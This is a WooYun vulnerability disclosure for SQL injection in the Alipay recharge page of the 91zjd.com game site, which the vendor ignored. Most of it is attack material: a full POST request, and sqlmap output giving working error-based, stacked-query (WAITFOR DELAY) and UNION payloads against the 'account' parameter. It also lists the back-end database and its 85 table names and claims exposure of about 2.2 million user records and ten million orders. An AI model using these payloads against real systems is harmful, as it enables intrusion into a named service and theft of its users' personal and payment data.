当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0154213

漏洞标题:紫金岛游戏主站存在SQL漏洞可UNION(200万用户信息及千万订单信息)

相关厂商:91zjd.com

漏洞作者: 路人甲

提交时间:2015-11-19 09:44

修复时间:2015-11-25 09:00

公开时间:2015-11-25 09:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-19: 细节已通知厂商并且等待厂商处理中
2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

POST /recharge/alipay_recharge.asp HTTP/1.1
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDCSTTDCDB=KLFDBCBAJGFLMKFJLJJMCKNL; ASP.NET_SessionId=514hzo55fo1wrz55ipgybo55; Hm_lvt_d5924889d984deffd476e1699e74ce59=1447669732,1447669829,1447669830,1447669852; Hm_lpvt_d5924889d984deffd476e1699e74ce59=1447669852; CNZZDATA4818108=cnzz_eid%3D899435885-1447669577-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1447669577; bdshare_firstime=1447669578206; HMACCOUNT=23FE2290393AAD15; BAIDUID=B65CAF626516BDEBC3DF19CD8CC25F5B:FG=1
Host: www.91zjd.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111&againaccount=4111111111111111&DropDownList1=1&txtyzm=1

22.jpg

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: account (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111' AND 7184=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (7184=7184) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(98)+CHAR(113))) AND 'yPCg'='yPCg&againaccount=4111111111111111&DropDownList1=1&txtyzm=1
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=11111';WAITFOR DELAY '0:0:5'--&againaccount=4111111111111111&DropDownList1=1&txtyzm=1
    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: immediately_rech=%c1%a2%bc%b4%b3%e4%d6%b5&account=-8992' UNION ALL SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(73)+CHAR(68)+CHAR(112)+CHAR(107)+CHAR(88)+CHAR(98)+CHAR(117)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(113)+CHAR(118)+CHAR(98)+CHAR(98)+CHAR(113)-- &againaccount=4111111111111111&DropDownList1=1&txtyzm=1
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
Database: QPGameUserDB
[85 tables]
+------------------------------+
| 168logo_ForTG                |
| 168logo_ForTeam              |
| 168logo_ForTeam              |
| AccountsInfo0821             |
| AccountsInfo1121             |
| AccountsInfo_20131010        |
| AccountsInfo_20131010        |
| AccountsInfo_emailbak        |
| AccountsInfo_emailbak        |
| AccountsInfo_regtj           |
| AccountsInfo_temp1           |
| AccountsInfo_temp1           |
| AccountsInfo_xt              |
| AccountsInfobak              |
| ConfineAddress               |
| ConfineContent               |
| ConfineMachine               |
| CustomTable                  |
| D99_CMD                      |
| D99_REG                      |
| D99_Tmp                      |
| DIY_TEMPCOMMAND_TABLE        |
| DailyLogonPrize              |
| GameIdentifier               |
| GameUserBang_New_tyb         |
| GameUserBang_TYBLogo         |
| GameUserBang_TYB_WEEKLY_view |
| GameUserBang_TYB_WEEKLY_view |
| GameUserBang_abest_view      |
| GameUserBang_abest_view      |
| GoldEggsLog20110             |
| GoldEggsLog20110             |
| GoldEggsLog20110             |
| GoldEggsLog2012              |
| IndividualDatumFirend        |
| IndividualDatumbak           |
| IndividualDatumbak           |
| LuckUser                     |
| PK_GameDownloadCount         |
| PK_RegSourceIp               |
| PK_SOURCE_IP_POOL            |
| PK_WebPage_Click_Count       |
| QPGameUserDB                 |
| QQcdkey                      |
| Rechargeable_Card_TEST       |
| Rechargeable_Card_TEST       |
| Reg_Arrt                     |
| S3_Tmp                       |
| ShortUrlLink                 |
| SystemStatusInfo             |
| SystemStreamInfo             |
| UserAddScoreLogo             |
| UserMemberOrder              |
| UserWincountlogo             |
| VW_Charge_List               |
| View_AccountsInfo_regtjNew   |
| View_AccountsInfo_regtjNew   |
| View_CZK_TG                  |
| View_Rechargeable_Card_tg    |
| View_TYB_USERBANG            |
| View_UserALLLogo_bySpid      |
| View_UserALLLogo_bySpid      |
| View_UserFristLogo           |
| View_UserLogoNew             |
| View_UserLogoNew             |
| View_Userinfo_ME             |
| View_VWUserFristLogo         |
| View_t1                      |
| View_t310                    |
| View_t320                    |
| View_t500                    |
| Yjt_accounts                 |
| accountsinfo20110101         |
| comd_list                    |
| dxUserbak                    |
| dxuserall                    |
| dxuserall                    |
| dxuserlist                   |
| iphonetemp1                  |
| iphonetemp1                  |
| iphonetemp2                  |
| sqlmapoutput                 |
| tempUsername                 |
| tempcity                     |
| we                           |
+------------------------------+

222万用户信息:

23.png

千万订单信息:

24.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-11-25 09:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无